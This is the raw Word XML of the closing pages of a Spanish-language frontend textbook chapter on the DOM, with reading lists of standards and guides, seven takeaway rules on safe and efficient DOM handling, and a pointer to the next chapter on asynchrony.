        </w:rPr>
        <w:t>: los primeros resultados sobre DOM suelen ser respuestas de 2011 a problemas que ya no existen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9F7401" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc239320031"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Si leés tres</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="3C3232AA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">La </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>OWASP Cross Site Scripting Prevention Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">: documenta los vectores de 4.7.3 con más detalle del que cabe acá, y explica </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>por qué el filtrado por lista negra no funciona</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCE779A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">La documentación de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>DOMPurify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>: detalla qué sanea y qué no, que es lo que hay que saber antes de confiarle una descripción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CF329A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Osmani</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Rendering on the Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, con la sección de rendimiento de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>web.dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">: explican el recálculo de disposición de 4.10 y cómo evitarlo. Y la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>guía de análisis de memoria de Chrome DevTools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>, las instantáneas y las cadenas de retención de 4.11.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D507E6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc239320032"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Las fuentes normativas (para consultar, no para leer de corrido)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="719CE71B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>El DOM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">: el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>DOM Living Standard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> del WHATWG, en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>dom.spec.whatwg.org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, que reemplazó a los niveles del W3C. Define los tipos de nodo de 4.4, el despacho de eventos de 4.8 y el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>AbortController</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> de 4.9.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5AEE05" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Las interfaces de los elementos HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> —</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>dataset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>classList</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">— están en el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>HTML Living Standard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, cuya sección sobre el análisis de fragmentos documenta el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> de 4.7.3, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">incluida la exclusión de las etiquetas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A0F5B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Los niveles históricos del W3C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>DOM Level 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1998), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Level 2 Events</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2000) —que introdujo el modelo de dos fases— y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Level 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2004), útiles para entender el origen de las decisiones de 4.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DBF239" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>La seguridad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">: el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Content-Security-Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> de 4.12 está normado en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>CSP Level 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> del W3C, y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Trusted Types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> se sigue en el repositorio del </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>WICG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE83837" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>La accesibilidad, que sigue vigente acá</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">: las </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>WCAG 2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> y la especificación </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>WAI-ARIA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> del W3C, de la sección 1.9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Un nodo creado con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>createElement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> recibe su rol en el árbol de accesibilidad igual que uno escrito a mano.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C18912" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc239320033"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Cierre: las siete cosas que hay que recordar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="0BB45162" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Si dentro de un mes te acordás de siete frases, que sean estas.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0351B" w14:paraId="1666A90B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="DEEBF7" w:fill="DEEBF7"/>
          </w:tcPr>
          <w:p w14:paraId="1FA2C7EA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="2E74B5"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>LAS SIETE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42DC0F09" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>1. El DOM no es el HTML.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> El HTML es el plano, el DOM es la casa — y desde este capítulo vos tirás paredes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F399A7F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>2. Vivo quiere decir que cambia mientras lo mirás.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Usá </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>querySelectorAll</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> y listo.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FE8C5E4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>3. El atributo es la ficha de inscripción; la propiedad es el alumno.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Para el estado de un control, propiedad. Siempre.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FFC87CF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>textContent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> pega el papel en la vidriera; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>innerHTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> lo lee por el altoparlante.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> De ahí RN-F02, y por eso no se escribe un sanitizador propio.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65F2CAB7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>5. La delegación es el portero del edificio.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Un manejador atiende a todos, incluso a los que se mudan mañana.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E57C95D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>6. Un nodo removido es un globo atado a la muñeca.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> No lo ves y sigue siendo tuyo. De ahí RN-F01, y </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>AbortController</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> es la tijera.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78D4CA6D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>7. Escribí todo primero, leé todo después.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Alternar dentro de un bucle es preguntarle el saldo al contador después de cada movimiento.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B6FBEC5" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Y una octava, que no está escrita en el capítulo pero está en todas sus páginas: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>ninguno de los dos problemas graves de este capítulo produce un error.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> El XSS compila y anda; la fuga también. Por eso el capítulo insiste tanto con las herramientas: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el panel de red, el de escuchas y el de memoria son la única forma de ver lo que la pantalla no muestra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F6791E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Continúa en:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Capítulo 5 — Asincronía y red: promesas, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, errores y eventos del servidor, donde el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>AbortController</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> de 4.9.4 vuelve para cancelar peticiones y el catálogo de errores de la sección 14.1 del TPI encuentra su lugar.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0000351B">
      <w:headerReference w:type="even" r:id="rId11"/>
      <w:headerReference w:type="default" r:id="rId12"/>
      <w:footerReference w:type="even" r:id="rId13"/>
      <w:footerReference w:type="default" r:id="rId14"/>
      <w:headerReference w:type="first" r:id="rId15"/>
      <w:footerReference w:type="first" r:id="rId16"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1500" w:right="1440" w:bottom="12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55F4" w14:textId="77777777" w:rsidR="00346AC7" w:rsidRDefault="00346AC7">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="721750DF" w14:textId="77777777" w:rsidR="00346AC7" w:rsidRDefault="00346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EBFC7EC-7C04-4356-ADB0-6316D3656D90}"/>
    <w:embedBold r:id="rId2" w:fontKey="{AE2E0CC7-AA11-4DD4-9B5E-3D3C15F4A5B3}"/>
    <w:embedItalic r:id="rId3" w:fontKey="{AD17C78B-D109-4744-91A5-629BCA677B32}"/>
    <w:embedBoldItalic r:id="rId4" w:fontKey="{FD754744-2FA0-4BE9-99B5-B94BDE6BB8C2}"/>
  </w:font>
  <w:font w:name="Cambria">
    <w:panose1 w:val="02040503050406030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00006FF" w:usb1="420024FF" w:usb2="02000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
    <w:embedRegular r:id="rId5" w:fontKey="{A4DF9EC9-0EE6-459D-AA90-B6FA32E2B1C2}"/>
    <w:embedBold r:id="rId6" w:fontKey="{82772E6D-AF27-426F-A7D6-8C9E995ED92E}"/>
    <w:embedItalic r:id="rId7" w:fontKey="{743716E0-854C-46D7-A137-6E9338452392}"/>
  </w:font>
  <w:font w:name="Georgia">
    <w:panose1 w:val="02040502050405020303"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000287" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/>
    <w:embedItalic r:id="rId8" w:fontKey="{A9F097FF-06E1-4AEC-897A-E8F4D9DC5AEE}"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00006FF" w:usb1="0000FCFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
    <w:embedRegular r:id="rId9" w:fontKey="{3BB9EBBE-7DAA-411D-8645-293363EC88FA}"/>
    <w:embedBold r:id="rId10" w:fontKey="{DA569B70-3E4E-4FAD-97AD-DE04B5D78FA3}"/>
  </w:font>
  <w:font w:name="Segoe UI">
    <w:panose1 w:val="020B0502040204020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E4002EFF" w:usb1="C000E47F" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
    <w:embedRegular r:id="rId11" w:fontKey="{A9080D29-885A-428A-87A8-92B1C378A8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F180" w14:textId="77777777" w:rsidR="00062DAF" w:rsidRDefault="00062D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FF96" w14:textId="77777777" w:rsidR="00435B2E" w:rsidRDefault="007F62F3">
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="1F4E79"/>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">  </w:t>
    </w:r>
    <w:r w:rsidR="00062DAF">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">FRONTEND </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00A771ED">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="FFFFFF"/>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116B" w14:textId="77777777" w:rsidR="00062DAF" w:rsidRDefault="00062D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9FC5E" w14:textId="77777777" w:rsidR="00346AC7" w:rsidRDefault="00346AC7">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0B780F50" w14:textId="77777777" w:rsidR="00346AC7" w:rsidRDefault="00346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59BF" w14:textId="77777777" w:rsidR="00062DAF" w:rsidRDefault="00062D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8CA9" w14:textId="77777777" w:rsidR="000254CB" w:rsidRPr="000254CB" w:rsidRDefault="007F62F3">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F4E79"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="60"/>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="es-AR"/>
      </w:rPr>
